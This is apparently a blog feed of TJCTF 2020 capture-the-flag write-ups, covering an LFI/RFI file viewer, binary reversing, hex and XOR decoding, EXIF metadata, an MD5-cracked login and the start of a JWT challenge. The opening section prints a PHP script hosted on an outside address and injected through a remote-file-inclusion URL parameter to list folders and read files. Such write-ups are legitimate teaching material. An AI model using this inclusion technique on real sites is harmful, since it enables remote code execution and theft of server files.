<p>We have a LFI/RFI with this website. We can make a script who will list the content of the folder. It shows a folder call <code>i_wonder_whats_in_here</code>. Go inside it and list again the content. This time is <code>flag.php</code>. Go read it!</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?php</span>
<span class="c1">// use the url to the php script as filename: http://file_viewer.tjctf.org/reader.php?file=http://x.x.x.x/fileviewer_rfi.php</span>
<span class="c1">// list content</span>
<span class="nv">$dir</span> <span class="o">=</span> <span class="s1">'.'</span><span class="p">;</span>
<span class="nv">$files1</span> <span class="o">=</span> <span class="nb">scandir</span><span class="p">(</span><span class="nv">$dir</span><span class="p">);</span>
<span class="nv">$files2</span> <span class="o">=</span> <span class="nb">scandir</span><span class="p">(</span><span class="nv">$dir</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="nb">print_r</span><span class="p">(</span><span class="nv">$files1</span><span class="p">);</span>
<span class="nb">print_r</span><span class="p">(</span><span class="nv">$files2</span><span class="p">);</span>
<span class="c1">// read the flag file</span>
<span class="k">echo</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="s1">'i_wonder_whats_in_here/flag.php'</span><span class="p">);</span>
<span class="cp">?></span><span class="x"></span>
</code></pre></div>
<p>We got the content in the source code of the page :</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?php</span>
<span class="cp"> // tjctf{n1c3_j0b_with_lf1_2_rc3}</span>
<span class="cp">?></span>
</code></pre></div>TJCTF2020 - Gym2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-gym.html<p><em>solves : 382</em></p>
<div class="highlight"><pre><span></span><code>Points: 20
Written by agcdragon
Aneesh wants to acquire a summer bod for beach week, but time is running out. Can you help him create a plan to attain his goal?
nc p1.tjctf.org 8008
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/bed9d7b7327958dab4d07b06772a032f3e97455e310956558579e8838762b5e2_gym">gym</a></p>
<p>We have a small game. The goal is to loose 31 …</p><p><em>solves : 382</em></p>
<div class="highlight"><pre><span></span><code>Points: 20
Written by agcdragon
Aneesh wants to acquire a summer bod for beach week, but time is running out. Can you help him create a plan to attain his goal?
nc p1.tjctf.org 8008
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/bed9d7b7327958dab4d07b06772a032f3e97455e310956558579e8838762b5e2_gym">gym</a></p>
<p>We have a small game. The goal is to loose 31 lbs (211-180).</p>
<div class="highlight"><pre><span></span><code><span class="err">╰─</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="n">bed9d7b7327958dab4d07b06772a032f3e97455e310956558579e8838762b5e2_gym</span><span class="w"></span>
<span class="n">I</span><span class="err">'</span><span class="n">m</span><span class="w"> </span><span class="n">currently</span><span class="w"> </span><span class="mi">211</span><span class="w"> </span><span class="n">lbs</span><span class="p">.</span><span class="w"> </span><span class="n">Can</span><span class="w"> </span><span class="n">I</span><span class="w"> </span><span class="n">be</span><span class="w"> </span><span class="n">exactly</span><span class="w"> </span><span class="mi">180</span><span class="vm">?</span><span class="w"> </span><span class="n">Help</span><span class="w"> </span><span class="n">me</span><span class="w"> </span><span class="k">out</span><span class="err">!</span><span class="w"></span>
<span class="c1">-------------------------</span>
<span class="n">Today</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="nf">day</span><span class="w"> </span><span class="mf">1.</span><span class="w"></span>
<span class="nf">Choose</span><span class="w"> </span><span class="n">an</span><span class="w"> </span><span class="nl">activity</span><span class="p">:</span><span class="w"></span>
<span class="o">[</span><span class="n">1</span><span class="o">]</span><span class="w"> </span><span class="n">Eat</span><span class="w"> </span><span class="n">healthy</span><span class="w"></span>
<span class="o">[</span><span class="n">2</span><span class="o">]</span><span class="w"> </span><span class="n">Do</span><span class="w"> </span><span class="mi">50</span><span class="w"> </span><span class="n">push</span><span class="o">-</span><span class="n">ups</span><span class="w"></span>
<span class="o">[</span><span class="n">3</span><span class="o">]</span><span class="w"> </span><span class="k">Go</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">run</span><span class="p">.</span><span class="w"></span>
<span class="o">[</span><span class="n">4</span><span class="o">]</span><span class="w"> </span><span class="n">Sleep</span><span class="w"> </span><span class="mi">8</span><span class="w"> </span><span class="n">hours</span><span class="p">.</span><span class="w"></span>
</code></pre></div>
<p>We add the binary to IDA and try to reverse it.</p>
<p>We can show each function and get how many lbs are remove from the total:</p>
<h2>eat_healthy</h2>
<div class="highlight"><pre><span></span><code> <span class="nf">public</span> <span class="no">eat_healthy</span>
<span class="nf">eat_healthy</span> <span class="no">proc</span> <span class="no">near</span> <span class="c1">; CODE XREF: main+16E↓p</span>
<span class="nf">var_14</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">14</span><span class="no">h</span>
<span class="nf">var_4</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">4</span>
<span class="c1">; __unwind {</span>
<span class="nf">push</span> <span class="no">rbp</span>
<span class="nf">mov</span> <span class="no">rbp</span><span class="p">,</span> <span class="no">rsp</span>
<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_14</span><span class="p">],</span> <span class="no">edi</span>
<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">],</span> <span class="mi">4</span>
<span class="nf">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">]</span>
<span class="nf">pop</span> <span class="no">rbp</span>
<span class="nf">retn</span>
<span class="c1">; } // starts at 95A</span>
<span class="nf">eat_healthy</span> <span class="no">endp</span>
</code></pre></div>
<h2>do_pushup</h2>
<div class="highlight"><pre><span></span><code> <span class="nf">public</span> <span class="no">do_pushup</span>
<span class="nf">do_pushup</span> <span class="no">proc</span> <span class="no">near</span> <span class="c1">; CODE XREF: main+183↓p</span>
<span class="nf">var_14</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">14</span><span class="no">h</span>
<span class="nf">var_4</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">4</span>
<span class="c1">; __unwind {</span>
<span class="nf">push</span> <span class="no">rbp</span>
<span class="nf">mov</span> <span class="no">rbp</span><span class="p">,</span> <span class="no">rsp</span>
<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_14</span><span class="p">],</span> <span class="no">edi</span>
<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">],</span> <span class="mi">1</span>
<span class="nf">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">]</span>
<span class="nf">pop</span> <span class="no">rbp</span>
<span class="nf">retn</span>
<span class="c1">; } // starts at 96D</span>
<span class="nf">do_pushup</span> <span class="no">endp</span>
</code></pre></div>
<h2>go_run</h2>
<div class="highlight"><pre><span></span><code> <span class="nf">public</span> <span class="no">go_run</span>
<span class="nf">go_run</span> <span class="no">proc</span> <span class="no">near</span> <span class="c1">; CODE XREF: main+198↓p</span>
<span class="nf">var_14</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">14</span><span class="no">h</span>
<span class="nf">var_4</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">4</span>
<span class="c1">; __unwind {</span>
<span class="nf">push</span> <span class="no">rbp</span>
<span class="nf">mov</span> <span class="no">rbp</span><span class="p">,</span> <span class="no">rsp</span>
<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_14</span><span class="p">],</span> <span class="no">edi</span>
<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">],</span> <span class="mi">2</span>
<span class="nf">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">]</span>
<span class="nf">pop</span> <span class="no">rbp</span>
<span class="nf">retn</span>
<span class="c1">; } // starts at 980</span>
<span class="nf">go_run</span> <span class="no">endp</span>
</code></pre></div>
<h2>go_sleep</h2>
<div class="highlight"><pre><span></span><code> <span class="nf">public</span> <span class="no">go_sleep</span>
<span class="nf">go_sleep</span> <span class="no">proc</span> <span class="no">near</span> <span class="c1">; CODE XREF: main+1AB↓p</span>
<span class="nf">var_14</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">14</span><span class="no">h</span>
<span class="nf">var_4</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">4</span>
<span class="c1">; __unwind {</span>
<span class="nf">push</span> <span class="no">rbp</span>
<span class="nf">mov</span> <span class="no">rbp</span><span class="p">,</span> <span class="no">rsp</span>
<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_14</span><span class="p">],</span> <span class="no">edi</span>
<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">],</span> <span class="mi">3</span>
<span class="nf">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">]</span>
<span class="nf">pop</span> <span class="no">rbp</span>
<span class="nf">retn</span>
<span class="c1">; } // starts at 993</span>
<span class="nf">go_sleep</span> <span class="no">endp</span>
</code></pre></div>
<p>Nice! We know the value for each action :</p>
<table>
<thead>
<tr>
<th>Action</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>Eat healthy</td>
<td>4</td>
</tr>
<tr>
<td>Do 50 push-ups</td>
<td>1</td>
</tr>
<tr>
<td>Go for a run.</td>
<td>2</td>
</tr>
<tr>
<td>Sleep 8 hours.</td>
<td>3</td>
</tr>
</tbody>
</table>
<p>A quick check make the thing impossible since we have only 7 days (7 * 4 = 28).</p>
<p>Let's check how the <code>main</code> function is build:</p>
<div class="highlight"><pre><span></span><code><span class="kt">int</span> <span class="kr">__cdecl</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="n">envp</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// eax</span>
<span class="kt">signed</span> <span class="kt">int</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-A4h]</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+10h] [rbp-A0h]</span>
<span class="kt">FILE</span> <span class="o">*</span><span class="n">stream</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-98h]</span>
<span class="kt">char</span> <span class="n">s</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-90h]</span>
<span class="kt">char</span> <span class="n">v9</span><span class="p">;</span> <span class="c1">// [rsp+60h] [rbp-50h]</span>
<span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v10</span><span class="p">;</span> <span class="c1">// [rsp+A8h] [rbp-8h]</span>
<span class="n">v10</span> <span class="o">=</span> <span class="n">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span>
<span class="n">v5</span> <span class="o">=</span> <span class="mi">211</span><span class="p">;</span>
<span class="n">setbuf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span>
<span class="n">setbuf</span><span class="p">(</span><span class="n">stdin</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span>
<span class="n">setbuf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"I'm currently %d lbs. Can I be exactly 180? Help me out!"</span><span class="p">,</span> <span class="mi">211LL</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="p">(</span><span class="kt">signed</span> <span class="kt">int</span><span class="p">)</span><span class="n">i</span> <span class="o"><=</span> <span class="mi">7</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">-------------------------"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Today is day %d.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Choose an activity:"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[1] Eat healthy"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[2] Do 50 push-ups"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[3] Go for a run."</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[4] Sleep 8 hours."</span><span class="p">);</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">fgets</span><span class="p">(</span><span class="o">&</span><span class="n">s</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span>
<span class="n">v3</span> <span class="o">=</span> <span class="n">atoi</span><span class="p">(</span><span class="o">&</span><span class="n">s</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">==</span> <span class="mi">2</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">v5</span> <span class="o">-=</span> <span class="n">do_pushup</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="mi">4LL</span><span class="p">);</span>
<span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">></span> <span class="mi">2</span> <span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">==</span> <span class="mi">3</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">v5</span> <span class="o">-=</span> <span class="n">go_run</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="mi">4LL</span><span class="p">);</span>
<span class="nl">LABEL_12</span><span class="p">:</span>
<span class="n">v5</span> <span class="o">-=</span> <span class="n">go_sleep</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="mi">4LL</span><span class="p">);</span>
<span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">==</span> <span class="mi">4</span> <span class="p">)</span>
<span class="k">goto</span> <span class="n">LABEL_12</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">v5</span> <span class="o">-=</span> <span class="n">eat_healthy</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="mi">4LL</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">sleep</span><span class="p">(</span><span class="mi">3u</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">v5</span> <span class="o">==</span> <span class="mi">180</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">stream</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="s">"flag.txt"</span><span class="p">,</span> <span class="s">"r"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">stream</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"Flag File is Missing. Contact a moderator if running on server."</span><span class="p">);</span>
<span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">fgets</span><span class="p">(</span><span class="o">&</span><span class="n">v9</span><span class="p">,</span> <span class="mi">64</span><span class="p">,</span> <span class="n">stream</span><span class="p">);</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"Congrats on reaching your weight goal!"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Here is your prize: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">&</span><span class="n">v9</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"I didn't reach my goal :("</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>Oh! We see something really nice:</p>
<div class="highlight"><pre><span></span><code> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">==</span> <span class="mi">3</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">v5</span> <span class="o">-=</span> <span class="n">go_run</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="mi">4LL</span><span class="p">);</span>
<span class="nl">LABEL_12</span><span class="p">:</span>
<span class="n">v5</span> <span class="o">-=</span> <span class="n">go_sleep</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="mi">4LL</span><span class="p">);</span>
<span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>So. If we select the action <code>3</code> (Go for a run), the program make a sleep right after. We loose the weight for run and sleep, that makes a total of 5 lbs for each run.</p>
<p>Yes can get the value of 31 as the follow pattern : Run, Run, Run, Run, Run, Sleep and Sleep.</p>
<p>We input these choices and got back the flag: <code>tjctf{w3iGht_l055_i5_d1ff1CuLt}</code>.</p>TJCTF2020 - Hexillology2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-hexillology.html<p><em>solves : 206</em></p>
<div class="highlight"><pre><span></span><code>Points: 25 points
Written by jpes707
I recently designed a new flag for my imaginary nation, Hexistan. Do you like it?
</code></pre></div>
<p><img alt="meme.png" src="https://blog.nlegall.fr/files/tjctf/2020/af83861c918131864a4e3df24c49d9bad766ae701f02387ee0698593b44f3390_Hexillology.png"></p>
<p>The name gives us a hint: <code>Hex</code>. We have 7 differents colors in the pictures. Let's get the hexa code for each one: <code>746a6374667b70594a7266514b306462615450477d</code>.</p>
<p>We have a …</p><p><em>solves : 206</em></p>
<div class="highlight"><pre><span></span><code>Points: 25 points
Written by jpes707
I recently designed a new flag for my imaginary nation, Hexistan. Do you like it?
</code></pre></div>
<p><img alt="meme.png" src="https://blog.nlegall.fr/files/tjctf/2020/af83861c918131864a4e3df24c49d9bad766ae701f02387ee0698593b44f3390_Hexillology.png"></p>
<p>The name gives us a hint: <code>Hex</code>. We have 7 differents colors in the pictures. Let's get the hexa code for each one: <code>746a6374667b70594a7266514b306462615450477d</code>.</p>
<p>We have a hex value and we can decode it with python:</p>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="nb">bytes</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="s1">'746a6374667b70594a7266514b306462615450477d'</span><span class="p">)</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s1">'utf-8'</span><span class="p">)</span>
<span class="s1">'tjctf</span><span class="si">{pYJrfQK0dbaTPG}</span><span class="s1">'</span>
</code></pre></div>TJCTF2020 - Is This Crypto?2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-is-this-crypto.html<p><em>solves : 123</em></p>
<div class="highlight"><pre><span></span><code>Points: 50
Written by KyleForkBomb
Is this crypto?
Hint: The message is entirely printable characters
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/e141851decd4f7afab034c7055db229bd54011d2860ebd622302088fd4e062ae_file.txt">file.txt</a></p>
<p>We have a file with strange text inside:</p>
<div class="highlight"><pre><span></span><code>גפעהדפ±ע��
</code></pre></div>
<p>We don't have any clue about this file and cipher used. CyberChef maybe can do some magic:</p>
<p><img alt="isthiscrypto.png" src="https://blog.nlegall.fr/images/tjctf/2020/isthiscrypto.png"></p>
<p>Oh! And it detects …</p><p><em>solves : 123</em></p>
<div class="highlight"><pre><span></span><code>Points: 50
Written by KyleForkBomb
Is this crypto?
Hint: The message is entirely printable characters
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/e141851decd4f7afab034c7055db229bd54011d2860ebd622302088fd4e062ae_file.txt">file.txt</a></p>
<p>We have a file with strange text inside:</p>
<div class="highlight"><pre><span></span><code>גפעהדפ±ע��
</code></pre></div>
<p>We don't have any clue about this file and cipher used. CyberChef maybe can do some magic:</p>
<p><img alt="isthiscrypto.png" src="https://blog.nlegall.fr/images/tjctf/2020/isthiscrypto.png"></p>
<p>Oh! And it detects XOR. Let's select it and try to decode the file. CyberChef gives us the clear text back:</p>
<div class="highlight"><pre><span></span><code>Cryptography is a discipline that has been around for quite a long time, but in recent times it has seen an explosion of research and implementation. This discipline seeks to provide secure communication and shared data storage using public key cryptography, which essentially reduces the damage that can be done through encryption.
tjctf{n0_th15_is_kyl3}
The Data Centre Standard for Confidentiality and Integrity states that a computer system must not contain any information that cannot be provided at the time of requesting it. The purpose of this standard is to ensure that no data from a connected computer system can be accessed by an unauthorised party. This would allow users to protect their data and make their personal information secure, which is more important than ever.
</code></pre></div>TJCTF2020 - Ling Ling2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-ling-ling.html<p><em>solves : 529</em></p>
<div class="highlight"><pre><span></span><code>Points: 10
Written by KyleForkBomb
Who made this meme? I made this meme! unless.....
</code></pre></div>
<p><img alt="meme.png" src="https://blog.nlegall.fr/files/tjctf/2020/d25fe79e6276ed73a0f7009294e28c035437d7c7ffe2f46285e9eb5ac94b6bec_meme.png"></p>
<p>We have an image. Like always now, just use <code>exiftool</code> to print all the metainfo that the file contains:</p>
<div class="highlight"><pre><span></span><code>╰─ exiftool d25fe79e6276ed73a0f7009294e28c035437d7c7ffe2f46285e9eb5ac94b6bec_meme.png
ExifTool Version Number : <span class="m">11</span>.85
File Name : d25fe79e6276ed73a0f7009294e28c035437d7c7ffe2f46285e9eb5ac94b6bec_meme.png
<span class="o">[</span>...<span class="o">]</span>
Artist : tjctf<span class="o">{</span>ch0p1n_fl4gs …</code></pre></div><p><em>solves : 529</em></p>
<div class="highlight"><pre><span></span><code>Points: 10
Written by KyleForkBomb
Who made this meme? I made this meme! unless.....
</code></pre></div>
<p><img alt="meme.png" src="https://blog.nlegall.fr/files/tjctf/2020/d25fe79e6276ed73a0f7009294e28c035437d7c7ffe2f46285e9eb5ac94b6bec_meme.png"></p>
<p>We have an image. Like always now, just use <code>exiftool</code> to print all the metainfo that the file contains:</p>
<div class="highlight"><pre><span></span><code>╰─ exiftool d25fe79e6276ed73a0f7009294e28c035437d7c7ffe2f46285e9eb5ac94b6bec_meme.png
ExifTool Version Number : <span class="m">11</span>.85
File Name : d25fe79e6276ed73a0f7009294e28c035437d7c7ffe2f46285e9eb5ac94b6bec_meme.png
<span class="o">[</span>...<span class="o">]</span>
Artist : tjctf<span class="o">{</span>ch0p1n_fl4gs<span class="o">}</span>
Y Cb Cr Positioning : Centered
Image Size : 623x890
Megapixels : <span class="m">0</span>.554
</code></pre></div>
<p>Not hard one, the flag is in clear as the artist field: <code>tjctf{ch0p1n_fl4gs}</code>.</p>TJCTF2020 - Login2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-login.html<p><em>solves : 674</em></p>
<div class="highlight"><pre><span></span><code>Points: 30
Written by saisree
Could you login into this very secure site? Best of luck!
</code></pre></div>
<p>We have a standard login page with some JS code inside to perform the login:</p>
<p><img alt="login1.png" src="https://blog.nlegall.fr/images/tjctf/2020/login1.png"></p>
<p>We have a hash inside: <code>c2a094f7d35f2299b414b6a1b3bd595a</code>. Let's try it with <a href="https://crackstation.net/">crackstation</a>. It detects it as MD5 and …</p><p><em>solves : 674</em></p>
<div class="highlight"><pre><span></span><code>Points: 30
Written by saisree
Could you login into this very secure site? Best of luck!
</code></pre></div>
<p>We have a standard login page with some JS code inside to perform the login:</p>
<p><img alt="login1.png" src="https://blog.nlegall.fr/images/tjctf/2020/login1.png"></p>
<p>We have a hash inside: <code>c2a094f7d35f2299b414b6a1b3bd595a</code>. Let's try it with <a href="https://crackstation.net/">crackstation</a>. It detects it as MD5 and give us back the clear password: <code>inevitable</code>.</p>
<p>We can now login as admin with this password and the new page show the flag: <code>tjctf{inevitable890898}</code>.</p>TJCTF2020 - Moar Horse 42020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-moar-horse-4.html<p><em>solves : 78</em></p>
<div class="highlight"><pre><span></span><code>Points: 80
Written by nthistle
It seems like the TJCTF organizers are secretly running an underground virtual horse racing platform! They call it 'Moar Horse 4'... See if you can get a flag from it!
Source
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/49bf39e0f4815da8cc806f26306d5d6f629b2306ad14ae20fb03b7195e05622e_server.zip">server.zip</a></p>
<p>Since we have the source, let's take a loot into …</p><p><em>solves : 78</em></p>
<div class="highlight"><pre><span></span><code>Points: 80
Written by nthistle
It seems like the TJCTF organizers are secretly running an underground virtual horse racing platform! They call it 'Moar Horse 4'... See if you can get a flag from it!
Source
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/49bf39e0f4815da8cc806f26306d5d6f629b2306ad14ae20fb03b7195e05622e_server.zip">server.zip</a></p>
<p>Since we have the source, let's take a loot into it:</p>
<div class="highlight"><pre><span></span><code>╰─ tree
.
├── horse_names.txt
├── pubkey.pem
├── server.py
├── static
│ ├── css
│ │ └── style.css
│ └── images
│ ├── horse.png
│ └── mechahorse.png
└── templates
├── main.html
├── new_user.html
├── race.html
├── race_results.html
└── store.html
<span class="m">4</span> directories, <span class="m">11</span> files
</code></pre></div>
<p>We can extract some informations from the file <code>server.py</code>:</p>
<ul>
<li>We have a horse name: <code>BOSS_HORSE = "MechaOmkar-YG6BPRJM"</code></li>
<li><code>token = jwt.encode(data, PRIVATE_KEY, "RS256")</code> : the website use JWT token with RS256 algorithm</li>
<li><code>your_speed = int(hashlib.md5(("Horse_" + race_horse).encode()).hexdigest(), 16)</code> : how the speed of a horse in compute</li>
</ul>
<p>Let's get a look closer to this line:</p>
<div class="highlight"><pre><span></span><code><span class="n">your_speed</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">((</span><span class="s2">"Horse_"</span> <span class="o">+</span> <span class="n">race_horse</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">(),</span> <span class="mi">16</span><span class="p">)</span>
</code></pre></div>
<p>First, the hors name is added after the sting <code>Horse_</code>. Then, Python encodes it to bytes before hash the result with MD5. And finally, we convert the hash into int from Hexadecimal base.</p>
<p>We can have the target speed to beat since we have the boss's horse name:</p>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="nb">int</span><span class="p">(</span><span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">((</span><span class="s2">"Horse_MechaOmkar-YG6BPRJM"</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">(),</span> <span class="mi">16</span><span class="p">)</span>
<span class="mi">340282329007027273925800828829408515216</span>
</code></pre></div>
<p>Quite a rapid horse!</p>
<p>Ok, let's visit to the website and get a valid JWT token. We can edit it with <a href="https://github.com/ticarpi/jwt_tool">jwt_tool</a>.</p>
